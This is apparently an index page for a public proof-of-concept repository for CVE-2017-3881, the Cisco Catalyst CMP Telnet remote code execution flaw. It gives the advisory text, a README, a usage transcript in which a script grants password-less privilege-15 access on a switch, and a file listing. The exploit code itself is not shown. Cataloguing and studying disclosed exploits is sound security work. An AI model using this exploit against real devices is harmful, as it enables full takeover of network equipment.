
CVE-2017-3881 PoC — Multiple Cisco products: IOS and IOS XE Software input validation error vulnerability

Associated Vulnerability
Title: Multiple Cisco products: IOS and IOS XE Software input validation error vulnerability (CVE-2017-3881)
Description: A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.
Description: Cisco Catalyst Remote Code Execution PoC
Readme
# PoC-CVE-2017-3881
Cisco Catalyst Remote Code Execution PoC

This repository contains Proof-of-Concept code for exploiting a remote code execution vulnerability disclosed by Cisco Systems on March 17th 2017 - <https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp>


Description
-------------
Exploit write-up: https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/

RCE exploit code is available for the Cisco Catalyst 2960 switch model. This exploit is firmware dependent. Two firmware versions are supported:

- 12.2(55)SE1  C2960-LANBASEK9-M
- 12.2(55)SE11 C2960-LANBASEK9-M

Denial of service code is available as a Metasploit Ruby module. This should work for most of the switches mentioned in the Cisco advisory (confirmation needed).

Usage example
-------------

```
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15
```


Thanks to Author:
-------------

Artem Kondratenko https://twitter.com/artkond
File Snapshot
-------------

```
[4.0K] /data/pocs/7adafdd1757abca5e31acaeea4a87d51427c7310
├── [2.7K] c2960-lanbasek9-m-12.2.55.se11.py
├── [2.7K] c2960-lanbasek9-m-12.2.55.se1.py
├── [1.5K] CVE-2017-3881-metasploit-module.rb
└── [1.3K] README.md

0 directories, 4 files
```